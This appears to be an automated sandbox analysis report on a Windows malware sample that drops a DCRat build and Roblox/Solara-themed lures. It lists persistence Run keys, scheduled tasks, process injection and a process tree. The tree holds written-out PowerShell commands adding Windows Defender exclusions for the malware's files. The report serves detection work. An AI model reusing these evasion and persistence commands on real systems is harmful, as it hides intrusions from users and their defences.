\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Recovery\\WindowsRE\\msiexec.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files\\Microsoft Office\\Office16\\services.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Paint = "C:\\Users\\Admin\\Music\\xdwdAdobe Illustrator.exe" sddsfsdf.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" Roblox.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Users\\Admin\\Videos\\WmiPrvSE.exe\"" Refcrt.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Users\\All Users\\Templates\\msiexec.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\DriversavessessionDlldhcp\\cmd.exe\"" Refcrt.exe -
Blocklisted process makes network request 2 IoCs
Processes:
msiexec.exeflow pid process 27 4492 msiexec.exe 29 4492 msiexec.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exedescription ioc process File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 26 ip-api.com 51 ipinfo.io 52 ipinfo.io -
Drops file in System32 directory 2 IoCs
Processes:
csc.exedescription ioc process File created \??\c:\Windows\System32\CSCEDEE80FABE974800B5DBB2ADA3AD378B.TMP csc.exe File created \??\c:\Windows\System32\sobql9.exe csc.exe -
Drops file in Program Files directory 20 IoCs
Processes:
Refcrt.exeRefcrt.execsc.execsc.exeComContainerbrowserRefRuntime.execsc.execsc.exedescription ioc process File created C:\Program Files\Microsoft Office\Office16\services.exe Refcrt.exe File created C:\Program Files\ModifiableWindowsApps\spoolsv.exe Refcrt.exe File created C:\Program Files\7-Zip\Lang\a0b1fd4c5438e9 Refcrt.exe File created C:\Program Files\Windows Sidebar\TextInputHost.exe Refcrt.exe File opened for modification C:\Program Files\Windows Sidebar\TextInputHost.exe Refcrt.exe File created \??\c:\Program Files\Microsoft Office\Office16\services.exe csc.exe File created \??\c:\Program Files\Windows NT\TableTextService\en-US\conhost.exe csc.exe File created C:\Program Files\Windows NT\TableTextService\en-US\conhost.exe Refcrt.exe File created C:\Program Files\Windows NT\TableTextService\en-US\088424020bedd6 Refcrt.exe File created C:\Program Files\7-Zip\Lang\Refcrt.exe Refcrt.exe File created C:\Program Files (x86)\Google\33f6b6f444b053 ComContainerbrowserRefRuntime.exe File created \??\c:\Program Files\Windows NT\TableTextService\en-US\CSCCF1AAFE95DF4408AFAA786A37D33121.TMP csc.exe File created \??\c:\Program Files\7-Zip\Lang\Refcrt.exe csc.exe File created C:\Program Files (x86)\Google\ComContainerbrowserRefRuntime.exe ComContainerbrowserRefRuntime.exe File created \??\c:\Program Files\7-Zip\Lang\CSC6C23FC88DE514248B2B06EB9A779747D.TMP csc.exe File created C:\Program Files\Microsoft Office\Office16\c5b4cb5e9653cc Refcrt.exe File created C:\Program Files\Windows Sidebar\22eafd247d37c3 Refcrt.exe File created \??\c:\Program Files\Microsoft Office\Office16\CSC13CEFDF3D78F44CBB74210E0B4722E24.TMP csc.exe File created \??\c:\Program Files\Windows Sidebar\CSC4DA05245C94C4B5D9D4CDA48E3EE2C5B.TMP csc.exe File created \??\c:\Program Files\Windows Sidebar\TextInputHost.exe csc.exe -
Drops file in Windows directory 14 IoCs
Processes:
msiexec.exeComContainerbrowserRefRuntime.exesddsfsdf.exedescription ioc process File created C:\Windows\Installer\e57d11b.msi msiexec.exe File opened for modification C:\Windows\Installer\e57d11b.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIF08F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID34E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE7A4.tmp msiexec.exe File created C:\Windows\CSC\spoolsv.exe ComContainerbrowserRefRuntime.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\xdwd.dll sddsfsdf.exe File opened for modification C:\Windows\Installer\MSIF05F.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC} msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSID38D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID39E.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 6 IoCs
Processes:
ComContainerbrowserRefRuntime.exeRoblox.exeDCRatBuild.exeFrage build.exesolara.exeRefcrt.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings ComContainerbrowserRefRuntime.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings Roblox.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings DCRatBuild.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings Frage build.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings solara.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings Refcrt.exe -
Runs ping.exe 1 TTPs 2 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2788 schtasks.exe 32 schtasks.exe 3184 schtasks.exe 5856 schtasks.exe 1808 schtasks.exe 2572 schtasks.exe 2104 schtasks.exe 6040 schtasks.exe 5132 schtasks.exe 888 schtasks.exe 556 schtasks.exe 5664 schtasks.exe 3816 schtasks.exe 7160 schtasks.exe 548 schtasks.exe 1568 schtasks.exe 4912 schtasks.exe 2632 schtasks.exe 1592 schtasks.exe 4772 schtasks.exe 5472 schtasks.exe 1956 schtasks.exe 2636 schtasks.exe 5520 schtasks.exe 5988 schtasks.exe 6020 schtasks.exe 5060 schtasks.exe 3776 schtasks.exe 2844 schtasks.exe 7124 schtasks.exe 6272 schtasks.exe 2444 schtasks.exe 3224 schtasks.exe 7132 schtasks.exe 3712 schtasks.exe 2976 schtasks.exe 4564 schtasks.exe 6628 schtasks.exe 3912 schtasks.exe 4408 schtasks.exe 3280 schtasks.exe 5724 schtasks.exe 5540 schtasks.exe 6332 schtasks.exe 4460 schtasks.exe 1540 schtasks.exe 1568 schtasks.exe 3944 schtasks.exe 2136 schtasks.exe 3976 schtasks.exe 5980 schtasks.exe 6820 schtasks.exe 6064 schtasks.exe 7096 schtasks.exe 3532 schtasks.exe 60 schtasks.exe 5392 schtasks.exe 4544 schtasks.exe 6424 schtasks.exe 3960 schtasks.exe 1148 schtasks.exe 2788 schtasks.exe 6084 schtasks.exe 3000 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
SolaraBootstrapper.exeRefcrt.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exemsiexec.execonhost.exepowershell.exeRefcrt.exesddsfsdf.exepid process 2616 SolaraBootstrapper.exe 2616 SolaraBootstrapper.exe 3112 Refcrt.exe 3112 Refcrt.exe 3112 Refcrt.exe 3112 Refcrt.exe 3112 Refcrt.exe 3112 Refcrt.exe 3112 Refcrt.exe 764 powershell.exe 764 powershell.exe 2060 powershell.exe 1952 powershell.exe 1952 powershell.exe 2060 powershell.exe 1756 powershell.exe 1756 powershell.exe 3024 powershell.exe 3024 powershell.exe 3224 powershell.exe 3224 powershell.exe 3984 powershell.exe 3984 powershell.exe 2532 powershell.exe 2532 powershell.exe 2032 powershell.exe 2032 powershell.exe 2140 powershell.exe 2140 powershell.exe 3288 powershell.exe 3288 powershell.exe 2032 powershell.exe 3288 powershell.exe 2140 powershell.exe 1756 powershell.exe 1952 powershell.exe 2060 powershell.exe 764 powershell.exe 3224 powershell.exe 3024 powershell.exe 2532 powershell.exe 3984 powershell.exe 4492 msiexec.exe 4492 msiexec.exe 5836 conhost.exe 5836 conhost.exe 5836 conhost.exe 5836 conhost.exe 5564 powershell.exe 5564 powershell.exe 4952 Refcrt.exe 4952 Refcrt.exe 5564 powershell.exe 5564 powershell.exe 5564 powershell.exe 4048 sddsfsdf.exe 4048 sddsfsdf.exe 4048 sddsfsdf.exe 4048 sddsfsdf.exe 4048 sddsfsdf.exe 4048 sddsfsdf.exe 4952 Refcrt.exe 4952 Refcrt.exe 4048 sddsfsdf.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
sddsfsdf.exeSolaraBootstrapper.exeRefcrt.exemsiexec.exemsiexec.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.exepowershell.exeRefcrt.exepowershell.exedescription pid process Token: SeDebugPrivilege 4048 sddsfsdf.exe Token: SeDebugPrivilege 2616 SolaraBootstrapper.exe Token: SeDebugPrivilege 3112 Refcrt.exe Token: SeShutdownPrivilege 3560 msiexec.exe Token: SeIncreaseQuotaPrivilege 3560 msiexec.exe Token: SeSecurityPrivilege 4492 msiexec.exe Token: SeCreateTokenPrivilege 3560 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3560 msiexec.exe Token: SeLockMemoryPrivilege 3560 msiexec.exe Token: SeIncreaseQuotaPrivilege 3560 msiexec.exe Token: SeMachineAccountPrivilege 3560 msiexec.exe Token: SeTcbPrivilege 3560 msiexec.exe Token: SeSecurityPrivilege 3560 msiexec.exe Token: SeTakeOwnershipPrivilege 3560 msiexec.exe Token: SeLoadDriverPrivilege 3560 msiexec.exe Token: SeSystemProfilePrivilege 3560 msiexec.exe Token: SeSystemtimePrivilege 3560 msiexec.exe Token: SeProfSingleProcessPrivilege 3560 msiexec.exe Token: SeIncBasePriorityPrivilege 3560 msiexec.exe Token: SeCreatePagefilePrivilege 3560 msiexec.exe Token: SeCreatePermanentPrivilege 3560 msiexec.exe Token: SeBackupPrivilege 3560 msiexec.exe Token: SeRestorePrivilege 3560 msiexec.exe Token: SeShutdownPrivilege 3560 msiexec.exe Token: SeDebugPrivilege 3560 msiexec.exe Token: SeAuditPrivilege 3560 msiexec.exe Token: SeSystemEnvironmentPrivilege 3560 msiexec.exe Token: SeChangeNotifyPrivilege 3560 msiexec.exe Token: SeRemoteShutdownPrivilege 3560 msiexec.exe Token: SeUndockPrivilege 3560 msiexec.exe Token: SeSyncAgentPrivilege 3560 msiexec.exe Token: SeEnableDelegationPrivilege 3560 msiexec.exe Token: SeManageVolumePrivilege 3560 msiexec.exe Token: SeImpersonatePrivilege 3560 msiexec.exe Token: SeCreateGlobalPrivilege 3560 msiexec.exe Token: SeRestorePrivilege 4492 msiexec.exe Token: SeTakeOwnershipPrivilege 4492 msiexec.exe Token: SeRestorePrivilege 4492 msiexec.exe Token: SeTakeOwnershipPrivilege 4492 msiexec.exe Token: SeRestorePrivilege 4492 msiexec.exe Token: SeTakeOwnershipPrivilege 4492 msiexec.exe Token: SeRestorePrivilege 4492 msiexec.exe Token: SeTakeOwnershipPrivilege 4492 msiexec.exe Token: SeDebugPrivilege 764 powershell.exe Token: SeDebugPrivilege 1952 powershell.exe Token: SeDebugPrivilege 2060 powershell.exe Token: SeDebugPrivilege 1756 powershell.exe Token: SeDebugPrivilege 3024 powershell.exe Token: SeDebugPrivilege 3224 powershell.exe Token: SeDebugPrivilege 2032 powershell.exe Token: SeDebugPrivilege 3984 powershell.exe Token: SeDebugPrivilege 2140 powershell.exe Token: SeDebugPrivilege 2532 powershell.exe Token: SeDebugPrivilege 3288 powershell.exe Token: SeRestorePrivilege 4492 msiexec.exe Token: SeTakeOwnershipPrivilege 4492 msiexec.exe Token: SeRestorePrivilege 4492 msiexec.exe Token: SeTakeOwnershipPrivilege 4492 msiexec.exe Token: SeRestorePrivilege 4492 msiexec.exe Token: SeTakeOwnershipPrivilege 4492 msiexec.exe Token: SeDebugPrivilege 5836 conhost.exe Token: SeDebugPrivilege 5564 powershell.exe Token: SeDebugPrivilege 4952 Refcrt.exe Token: SeDebugPrivilege 5160 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exeYoutube.exeDCRatBuild.exeResult.exeFrage build.exesolara.exeWScript.execmd.exeSolaraBootstrapper.exemsiexec.exeRefcrt.exedescription pid process target process PID 4476 wrote to memory of 2408 4476 2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe Youtube.exe PID 4476 wrote to memory of 2408 4476 2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe Youtube.exe PID 4476 wrote to memory of 2408 4476 2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe Youtube.exe PID 4476 wrote to memory of 4048 4476 2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe sddsfsdf.exe PID 4476 wrote to memory of 4048 4476 2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe sddsfsdf.exe PID 2408 wrote to memory of 4912 2408 Youtube.exe schtasks.exe PID 2408 wrote to memory of 4912 2408 Youtube.exe schtasks.exe PID 2408 wrote to memory of 4912 2408 Youtube.exe schtasks.exe PID 2408 wrote to memory of 3604 2408 Youtube.exe DCRatBuild.exe PID 2408 wrote to memory of 3604 2408 Youtube.exe DCRatBuild.exe PID 2408 wrote to memory of 3604 2408 Youtube.exe DCRatBuild.exe PID 2408 wrote to memory of 1156 2408 Youtube.exe Bloxstrap.exe PID 2408 wrote to memory of 1156 2408 Youtube.exe Bloxstrap.exe PID 2408 wrote to memory of 3600 2408 Youtube.exe Frage build.exe PID 2408 wrote to memory of 3600 2408 Youtube.exe Frage build.exe PID 2408 wrote to memory of 3600 2408 Youtube.exe Frage build.exe PID 3604 wrote to memory of 1036 3604 DCRatBuild.exe WScript.exe PID 3604 wrote to memory of 1036 3604 DCRatBuild.exe WScript.exe PID 3604 wrote to memory of 1036 3604 DCRatBuild.exe WScript.exe PID 4912 wrote to memory of 2616 4912 Result.exe SolaraBootstrapper.exe PID 4912 wrote to memory of 2616 4912 Result.exe SolaraBootstrapper.exe PID 4912 wrote to memory of 2616 4912 Result.exe SolaraBootstrapper.exe PID 4912 wrote to memory of 2632 4912 Result.exe schtasks.exe PID 4912 wrote to memory of 2632 4912 Result.exe schtasks.exe PID 4912 wrote to memory of 2632 4912 Result.exe schtasks.exe PID 3600 wrote to memory of 4196 3600 Frage build.exe WScript.exe PID 3600 wrote to memory of 4196 3600 Frage build.exe WScript.exe PID 3600 wrote to memory of 4196 3600 Frage build.exe WScript.exe PID 2632 wrote to memory of 2272 2632 solara.exe WScript.exe PID 2632 wrote to memory of 2272 2632 solara.exe WScript.exe PID 2632 wrote to memory of 2272 2632 solara.exe WScript.exe PID 2272 wrote to memory of 2716 2272 WScript.exe cmd.exe PID 2272 wrote to memory of 2716 2272 WScript.exe cmd.exe PID 2272 wrote to memory of 2716 2272 WScript.exe cmd.exe PID 2716 wrote to memory of 3112 2716 cmd.exe Refcrt.exe PID 2716 wrote to memory of 3112 2716 cmd.exe Refcrt.exe PID 2616 wrote to memory of 3560 2616 SolaraBootstrapper.exe msiexec.exe PID 2616 wrote to memory of 3560 2616 SolaraBootstrapper.exe msiexec.exe PID 2616 wrote to memory of 3560 2616 SolaraBootstrapper.exe msiexec.exe PID 4492 wrote to memory of 2416 4492 msiexec.exe MsiExec.exe PID 4492 wrote to memory of 2416 4492 msiexec.exe MsiExec.exe PID 4492 wrote to memory of 4856 4492 msiexec.exe MsiExec.exe PID 4492 wrote to memory of 4856 4492 msiexec.exe MsiExec.exe PID 4492 wrote to memory of 4856 4492 msiexec.exe MsiExec.exe PID 3112 wrote to memory of 3288 3112 Refcrt.exe powershell.exe PID 3112 wrote to memory of 3288 3112 Refcrt.exe powershell.exe PID 3112 wrote to memory of 2060 3112 Refcrt.exe powershell.exe PID 3112 wrote to memory of 2060 3112 Refcrt.exe powershell.exe PID 3112 wrote to memory of 3224 3112 Refcrt.exe schtasks.exe PID 3112 wrote to memory of 3224 3112 Refcrt.exe schtasks.exe PID 3112 wrote to memory of 1756 3112 Refcrt.exe powershell.exe PID 3112 wrote to memory of 1756 3112 Refcrt.exe powershell.exe PID 3112 wrote to memory of 2532 3112 Refcrt.exe powershell.exe PID 3112 wrote to memory of 2532 3112 Refcrt.exe powershell.exe PID 3112 wrote to memory of 1952 3112 Refcrt.exe powershell.exe PID 3112 wrote to memory of 1952 3112 Refcrt.exe powershell.exe PID 3112 wrote to memory of 764 3112 Refcrt.exe powershell.exe PID 3112 wrote to memory of 764 3112 Refcrt.exe powershell.exe PID 3112 wrote to memory of 2032 3112 Refcrt.exe powershell.exe PID 3112 wrote to memory of 2032 3112 Refcrt.exe powershell.exe PID 3112 wrote to memory of 3024 3112 Refcrt.exe powershell.exe PID 3112 wrote to memory of 3024 3112 Refcrt.exe powershell.exe PID 3112 wrote to memory of 2140 3112 Refcrt.exe powershell.exe PID 3112 wrote to memory of 2140 3112 Refcrt.exe powershell.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe"C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4476 -
C:\Users\Admin\AppData\Local\Temp\Youtube.exe"C:\Users\Admin\AppData\Local\Temp\Youtube.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Users\Admin\AppData\Local\Temp\Result.exe"C:\Users\Admin\AppData\Local\Temp\Result.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2616 -
C:\Windows\SysWOW64\msiexec.exe"msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3560
-
-
-
C:\Users\Admin\AppData\Local\Temp\solara.exe"C:\Users\Admin\AppData\Local\Temp\solara.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "6⤵
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"7⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3112 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3288
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\RuntimeBroker.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\msiexec.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Videos\WmiPrvSE.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1756
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\Office16\services.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Templates\msiexec.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\smss.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\conhost.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\TableTextService\en-US\conhost.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Start Menu\RuntimeBroker.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2140
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\Lang\Refcrt.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3984
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QgayOGv9z8.bat"8⤵PID:1844
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:29⤵PID:5892
-
-
C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"9⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4952 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'10⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
PID:2604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\TextInputHost.exe'10⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
PID:3772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\cmd.exe'10⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
PID:3912
-
-
C:\DriversavessessionDlldhcp\cmd.exe"C:\DriversavessessionDlldhcp\cmd.exe"10⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4540
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3604 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\winNet\we9fgyC144zVOkGk.vbe"4⤵
- Checks computer location settings
PID:1036 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat" "5⤵PID:3176
-
C:\winNet\ComContainerbrowserRefRuntime.exe"C:\winNet/ComContainerbrowserRefRuntime.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
PID:5312 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\7j6Rve8VVr.bat"7⤵PID:5784
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:5916
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- Runs ping.exe
PID:5872
-
-
C:\Users\Admin\conhost.exe"C:\Users\Admin\conhost.exe"8⤵PID:6536
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"3⤵
- Executes dropped EXE
PID:1156 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"4⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5836 -
